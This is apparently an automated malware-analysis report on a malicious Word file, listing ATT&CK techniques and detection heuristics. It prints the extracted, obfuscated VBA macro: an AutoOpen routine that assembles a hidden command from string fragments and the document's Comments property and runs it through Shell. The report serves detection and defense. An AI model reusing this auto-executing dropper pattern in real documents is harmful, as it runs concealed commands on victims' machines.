Verdict: MALICIOUS (Risk Score 142)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro triggers the execution of obfuscated VBA code. This code calls the Shell() function, a critical indicator of potential payload execution. The command string passed to Shell() is assembled at run time from string fragments and from the document's Comments property (ActiveDocument.BuiltInDocumentProperties), so the actual command is not visible in the macro source alone. The presence of the Shell() call and the autoexec marker strongly suggests the macro's purpose is to download and execute a second-stage payload.
Heuristics (5)

- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5687 bytes |

SHA-256 of macros.bas: 12ac87cbf09fd6872e1ca6c3f2fa70b9a0b2517187b82d4b1d8d4794cfa7f499
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
WdrGvPa
End Sub
Function WdrGvPa()
TpzZzLanfmh = "XgmVMaPsdR" + "vYAsCuA" + "GYbKzVnKS" + "YwueTTsDD" + "PgwtbXCYt" + "vbruykUF" + dthsKEzXbs = "XsfTRLNszWU" + "KNXNwTg" + "pXwSBAkdV" + "MZxwZBUrL" + "rNnveFs" + "XdHfYSeXar" + VTTUdKkD = "xVEYvCfRRcX" + "XMrmtZBf" + "YBmUVLZbhR" + "nTuEpMF" + "eBrnHztdyCD" + "TCWTYbLT" + spFtyMWW = "FpNhHFnVRA" + "DbucYAWxzeA" + "XuTUmEYrYD" + "EuvByut" + "rztBEzcEE" + "RmgvYPBZNr" + "EbvhXLBgTW"
faNAfshMUpw = "agrMsWFPm" + "yXgEkgWK" + "pVReyhZAR" + "DBHeDrA" + "yWLeazzbFMz" + "NNALSxsA" + VeGcUdVm = "XNWrAXNY" + "GuMpFBBCkt" + "vhVubRWbDC" + "ycGUMKBsYA" + "hSPXygezk" + "BahCNmffWB" + pdDSdLeghNP = "pkHvGnLcM" + "uvFZECB" + "fwzdEGpxsnz" + "YXWFzmaSS" + "GVgcvWkmx" + "FpcUGfzz" + "GKTXsfmtB"
srvnBAW = "HyaZUPR" + "pvbmrznVu" + "UVXpZPhww" + "EKgUUpUmep" + "RxAFPdDA" + "XrnPLXf" + beXpUWwwtk = "YgNrNxshav" + "spCYLRhF" + "gpvgXPFGFBP" + "hAfUrUnB" + "wgcFCcEV" + "CbyZeatdB" + TmGTHCeSH = "XYdLLZku" + "wVZmpdtR" + "rEkBudXDn" + "RFGsEMLLtdX" + "xGmTDNRfcZG" + "kkgwKfdkB" + VfHaaGXB = "uhrGpgZfZTN" + "PyNyCFZ" + "CpnwYhe" + "brGVNUDeGH" + "vpkcKdVCx" + "BcxUvpsxwf" + "wexwhcntN"
UwSTLdcmd = "vDLRdWe" + "TLgGwMk" + "BTvnLRePPhX" + "hrAuWtmXvN" + "PwuuxtHh" + "DHuWCXKS" + tgNVCfUm = "cytLprhz" + "MRcKchRKTy" + "SYeXFKaT" + "StUrUxPS" + "GkNwzdf" + "HwsAaxAkwsK" + "NYkLhaGREaD"
kdVXcrDe = "CPruxRuCLeY" + "LWnDHExYh" + "VwRRxtTBZd" + "BmPzNWzP" + "uaYDpwF" + "ewzgAZf" + KTwxcWh = "yfvyZmvHz" + "VRXZTdaDM" + "MEVPaXmVxP" + "AahMEhsNK" + "pVKxuEf" + "ueuTAkA" + YYSBYte = "hrNyteR" + "fgRExsVh" + "tPTVCVuRZ" + "LbfpBBhydk" + "CGWaNPkK" + "kNrLaZtuw" + RPraXYXHK = "WkPwkadg" + "AcxxzZK" + "NySxyzz" + "XauCKuNU" + "wXsHVtPDp" + "KxPfXeTcw" + "WwHaLbG"
kDLyWdxy = "pO" + rTmAcpYZgKM + SZvWDrkHP + NDzRxLtmV + kbtpcrUTbzF + fbtpmLsXntK + MBPaypPGm + LmKSKnssew + DgvBCZNWWk + EvwgfKMaZ + GyDMbhM + ActiveDocument.BuiltInDocumentProperties("Co" + "mm" + "ents") + rTmAcpYZgKM + SZvWDrkHP + NDzRxLtmV + kbtpcrUTbzF + fbtpmLsXntK + MBPaypPGm + LmKSKnssew + DgvBCZNWWk + EvwgfKMaZ + GyDMbhM + HhceduC
YpSKWUDT = "CNZmCegm" + "FCZmazhyE" + "ncAUTCCrt" + "VYxRDNRGG" + "xdEmEAKcNe" + "pUzXgMmRmD" + wkwwaUMc = "pWKfFuM" + "TxXFBmp" + "XCKAWSvX" + "CctdCsEatL" + "gAXnYewvx" + "nWnmhUPk" + zEcenUy = "BNvzEEBr" + "bWpbvHxTs" + "NnfyZNnwd" + "FcsYeCRxY" + "BZAVTrZYGhB" + "hxZEktT" + "dmnbUsDnKn"
ysHmEYEeK = "FDUNUKVM" + "TLxtmvwr" + "mBZAfseFhm" + "mwpVrbsmpBY" + "RVCeEEAMmu" + "LEFvDakM" + CvBkXGeX = "HPMPMeM" + "nSrgfUdWkA" + "kZtEbBdZEKB" + "aUxkMkST" + "hnNvpka" + "yFhCEHz" + "whsmxGP"
nsctMab = "XHwBXsAgbY" + "ECNKZSPA" + "ghTbeKNsFw" + "Dyafxbptn" + "cwscHpNuC" + "FUgpbzGayZ" + NSYVuwWnwz = "LVHbTBFvMEK" + "szVRUprf" + "rEdHPDvzDf" + "AKmdwkMDFME" + "SGHVTxR" + "ecyeZBpReyZ" + McHxzAFtKK = "LSSBmYvp" + "KaxdHRVSz" + "trVFyYPF" + "fNbYrrDLR" + "CneynFWznM" + "VhKbXzxn" + hebEPpLKVwW = "brbbvVX" + "GNxKYdrAmFX" + "NyAvECG" + "ymLeedzW" + "cFrWHHFf" + "NzzwHgYPgMm" + ALaGBYTLK = "ZwgpLyNhHHT" + "neLbydXBESC" + "dRXwmpbD" + "dWxWMvTr" + "CnBuVhMTS" + "SwCUCEaBwmp" + "bbgdCwfsYy"
dGrsaZEmSz = "csZhswYBnF" + "UwzZKWabME" + "pDXymXuuX" + "mFUcdLKZwCx" + "KUBUvsfNxC" + "ZwytFHTT" + YhBkknf = "pYBvDXm" + "FeNuYpAxcHp" + "zWsnGsKE" + "ugkCRfYHt" + "vucUYPDXw" + "KRLYuKu" + CphAwFdhATG = "ySRzyXBPRRy" + "BpHbGVyt" + "NwYFyLHXVHx" + "ZLgdSPeRUx" + "EXEkypaRE" + "GukkuERTRRa" + YvWLLXBc = "tmAyFBZy" + "FdgKUZHfSBW" + "NTLARWRCSkL" + "cbWyNNpnsn" + "wPVufgEyWfu" + "sVYmUDaTce" + "NUkfnUpctyv"
VBA.Shell$ "" + rTmAcpYZgKM + SZvWDrkHP + NDzRxLtmV + kbtpcrUTbzF + fbtpmLsXntK + MBPaypPGm + LmKSKnssew + DgvBCZNWWk + EvwgfKMaZ + GyDMbhM + kDLyWdxy + rTmAcpYZgKM + SZvWDrkHP + NDzRxLtmV + kbtpcrUTbzF + fbtpmLsXntK + MBPaypPGm + LmKSKnssew + DgvBCZNWWk + EvwgfKMaZ + GyDMbhM + BsHrCKkeZ, 0
BzcKLsF
... (truncated)
```